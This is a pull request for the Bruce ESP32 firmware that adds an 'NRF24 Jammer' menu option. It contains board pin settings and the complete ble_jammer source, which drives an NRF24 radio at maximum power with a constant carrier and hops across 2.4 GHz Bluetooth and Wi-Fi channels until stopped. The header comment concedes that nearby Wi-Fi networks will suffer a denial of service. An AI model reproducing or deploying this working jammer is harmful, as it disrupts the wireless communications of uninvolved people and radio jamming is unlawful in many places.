### PR TITLE
NRF25 Bluetooth Jammer

### DIFF
--- a/platformio.ini
+++ b/platformio.ini
@@ -62,6 +62,7 @@ lib_deps =
 	Adafruit Si4713 Library@1.2.3
 	SmartRC-CC1101-Driver-Lib=https://github.com/bmorcelli/SmartRC-CC1101-Driver-Lib/archive/refs/heads/Bruce.zip
 	h2zero/NimBLE-Arduino@^1.4.0
+	nrf24/RF24 @ ^1.4.9
 	;https://github.com/eadmaster/rtl_433_ESP
 
 [env:m5stack-cplus2]
@@ -126,6 +127,14 @@ build_flags =
     -DCC1101_SCK_PIN=0
     -DCC1101_MISO_PIN=33
     ;-DCC1101_GDO2_PIN=-1
+
+	; connections are the same as CC1101
+	-DUSE_NRF24_VIA_SPI
+	-DNRF24_CE_PIN=25
+    -DNRF24_SS_PIN=26  ; chip select
+    -DNRF24_MOSI_PIN=32
+    -DNRF24_SCK_PIN=0
+    -DNRF24_MISO_PIN=33
     
 	;Battery ADC read pin
 	-DBAT_PIN=38
@@ -230,6 +239,14 @@ build_flags =
     -DCC1101_SCK_PIN=0
     -DCC1101_MISO_PIN=33
     ;-DCC1101_GDO2_PIN=-1
+
+	; connections are the same as CC1101
+	-DUSE_NRF24_VIA_SPI
+	-DNRF24_CE_PIN=25
+    -DNRF24_SS_PIN=26  ; chip select
+    -DNRF24_MOSI_PIN=32
+    -DNRF24_SCK_PIN=0
+    -DNRF24_MISO_PIN=33
 
 	;Battery ADC read pin
 	-DBAT_PIN=10
@@ -345,6 +362,14 @@ build_flags =
 	-DCC1101_MISO_PIN=39  ; DAT0 on SDsniffer
 	;-DCC1101_GDO2_PIN=-1
     
+	; connections are the same as CC1101
+	-DUSE_NRF24_VIA_SPI
+	-DNRF24_CE_PIN=GROVE_SDA
+    -DNRF24_SS_PIN=GROVE_SCL  ; chip select
+    -DNRF24_MOSI_PIN=14
+    -DNRF24_SCK_PIN=40
+    -DNRF24_MISO_PIN=39
+
 	;Screen Setup
 	-DHAS_SCREEN=1
 	-DROTATION=1
@@ -833,6 +858,16 @@ build_flags =
     -DCC1101_SCK_PIN=12
     -DCC1101_MISO_PIN=13
     ;-DCC1101_GDO2_PIN=14  ; optional
+
+	; connections are the same as CC1101
+	-DUSE_NRF24_VIA_SPI
+	-DNRF24_CE_PIN=6
+    -DNRF24_SS_PIN=7  ; chip select
+    -DNRF24_MOSI_PIN=11
+    -DNRF24_SCK_PIN=12
+    -DNRF24_MISO_PIN=13
+
+
 lib_deps =
 	${common.lib_deps}
 
@@ -902,6 +937,24 @@ build_flags =
 	;Radio Frequency (one pin modules) pin setting
 	-DRF_TX_PINS='{{"M5 RF433T", GROVE_SDA}, {"Pin 1", 1}, {"Pin 2", 2}}'
 	-DRF_RX_PINS='{{"M5 FR433R", GROVE_SCL}, {"Pin 1", 1}, {"Pin 2", 2}}'	
+
+    ;CC1101 SPI connection pins
+    ; best connection pins for higher speed https://docs.espressif.com/projects/esp-idf/en/latest/esp32s3/api-reference/peripherals/spi_master.html#gpio-matrix-and-io-mux
+    ;-DUSE_CC1101_VIA_SPI
+    -DCC1101_GDO0_PIN=9
+    -DCC1101_SS_PIN=10
+    -DCC1101_MOSI_PIN=11
+    -DCC1101_SCK_PIN=12
+    -DCC1101_MISO_PIN=13
+    ;-DCC1101_GDO2_PIN=14  ; optional
+
+	; connections are the same as CC1101
+	;-DUSE_NRF24_VIA_SPI
+	-DNRF24_CE_PIN=6
+    -DNRF24_SS_PIN=7  ; chip select
+    -DNRF24_MOSI_PIN=11
+    -DNRF24_SCK_PIN=12
+    -DNRF24_MISO_PIN=13
 
 	;Font sizes, depending on device
 	-DFP=1

--- a/src/core/main_menu.cpp
+++ b/src/core/main_menu.cpp
@@ -9,6 +9,7 @@
 
 #include "modules/ble/ble_spam.h"
 #include "modules/ble/ble_common.h"
+#include "modules/ble/ble_jammer.h"
 #include "modules/others/openhaystack.h"
 #include "modules/others/tururururu.h"
 #include "modules/others/webInterface.h"
@@ -79,6 +80,11 @@ void bleOptions() {
   #if !defined(LITE_VERSION)
     {"BLE Beacon",   [=]() { ble_test(); }},
     {"BLE Scan",     [=]() { ble_scan(); }},
+  
+  #if defined(USE_NRF24_VIA_SPI)
+    {"NRF24 Jammer", [=]() { ble_jammer(); }},
+  #endif
+
   #endif
     {"AppleJuice",   [=]() { aj_adv(0); }},
     {"SwiftPair",    [=]() { aj_adv(1); }},

--- a/src/modules/ble/ble_jammer.cpp
+++ b/src/modules/ble/ble_jammer.cpp
@@ -9,6 +9,7 @@
 ** details : Starts 2.4Gz jammer usinf NRF24
 ************************************************************************************** */
 void ble_jammer() {
+  #if defined(USE_NRF24_VIA_SPI)
     sdcardSPI.begin(NRF24_SCK_PIN,NRF24_MISO_PIN,NRF24_MOSI_PIN,NRF24_SS_PIN);
     RF24 radio(NRF24_CE_PIN, NRF24_SS_PIN);                                                               ///ce-csn
     byte hopping_channel[] = {32,34, 46,48, 50, 52, 0, 1, 2, 4, 6, 8, 22, 24, 26, 28, 30, 74, 76, 78, 80, 82, 84,86 };  // channel to hop
@@ -42,4 +43,5 @@ void ble_jammer() {
         delay(500);
         while(!checkSelPress()); // wait confirmation
     }
+  #endif
 }

--- a/src/modules/ble/ble_jammer.cpp
+++ b/src/modules/ble/ble_jammer.cpp
@@ -1,0 +1,45 @@
+#include "ble_jammer.h"
+#include "core/globals.h"
+#include "core/mykeyboard.h"
+#include "core/display.h"
+
+
+/* **************************************************************************************
+** name : ble_jammer
+** details : Starts 2.4Gz jammer usinf NRF24
+************************************************************************************** */
+void ble_jammer() {
+    sdcardSPI.begin(NRF24_SCK_PIN,NRF24_MISO_PIN,NRF24_MOSI_PIN,NRF24_SS_PIN);
+    RF24 radio(NRF24_CE_PIN, NRF24_SS_PIN);                                                               ///ce-csn
+    byte hopping_channel[] = {32,34, 46,48, 50, 52, 0, 1, 2, 4, 6, 8, 22, 24, 26, 28, 30, 74, 76, 78, 80, 82, 84,86 };  // channel to hop
+    byte ptr_hop = 0;  // Pointer to the hopping array
+    if(radio.begin(&sdcardSPI)) {
+        Serial.println("NRF24 turned On");
+        
+        radio.setPALevel(RF24_PA_MAX);
+        radio.startConstCarrier(RF24_PA_MAX, 45);
+        radio.setAddressWidth(3);//optional
+        radio.setPayloadSize(2);//optional
+        if(!radio.setDataRate(RF24_2MBPS)) Serial.println("Fail setting data Rate");
+
+        drawMainBorder();
+        tft.setCursor(10,28);
+        tft.setTextSize(FM);
+        tft.println("BLE Jammer:");
+        tft.setCursor(10,tft.getCursorY()+8);
+        tft.println("Select to stop!");
+        delay(200);
+
+        while(!checkSelPress()) {
+            ptr_hop++;                                            /// perform next channel change
+            if (ptr_hop >= sizeof(hopping_channel)) ptr_hop = 0;  // To avoid array indexing overflow
+            radio.setChannel(hopping_channel[ptr_hop]);           // Change channel        
+        }
+        radio.powerDown();
+    } else { 
+        Serial.println("Fail Starting radio");
+        displayError("NRF24 not found");
+        delay(500);
+        while(!checkSelPress()); // wait confirmation
+    }
+}

--- a/src/modules/ble/ble_jammer.h
+++ b/src/modules/ble/ble_jammer.h
@@ -1,0 +1,23 @@
+
+#include <RF24.h>
+
+/*
+Credits: @smoochiee https://github.com/smoochiee/Ble-jammer
+         thank you for providing this simplified code for us! 
+
+Information:
+    - This Jammer is supposed to be used for Educational purpouse only. 
+    - The signal is strong enaugh to mess with 2.4Ghz spectrum, so probaby 2.4Gz Wifi networks will be affected causing a DOS attack
+    - If the target is near the bluetooth source (smartphone right beside the bluetooth speaker), the communication between them will be weakly affected (we don't do magic)
+
+FLAFS: 
+	USE_NRF24_VIA_SPI ;-> Uncomment to allow this ooption for the user
+	NRF24_CE_PIN=-1   ; Set this pin accordingly
+    NRF24_SS_PIN=-1   ; Set this pin accordingly
+    NRF24_MOSI_PIN=-1 ; Set this pin accordingly
+    NRF24_SCK_PIN=-1  ; Set this pin accordingly
+    NRF24_MISO_PIN=-1 ; Set this pin accordingly
+*/
+
+
+void ble_jammer();


### PR DESCRIPTION
#### Proposed Changes ####

Attending to https://github.com/pr3y/Bruce/issues/119
We can't deauth bluetooth devices ( https://github.com/pr3y/Bruce/issues/161 ), but it should be better

#### Types of Changes ####

Feature addition

#### Verification ####

Tested on Cardputer.. 
#### Testing ####

Need test on StickCPlus and Plus2.. it uses the same wiring diagram as CC1101 (just unplug 1101 and plug NRF24

#### Linked Issues ####
https://github.com/pr3y/Bruce/issues/119
https://github.com/pr3y/Bruce/issues/161

#### User-Facing Change ####
Adds a new option on BLE "NRF24 Jammer"

#### Further Comments ####

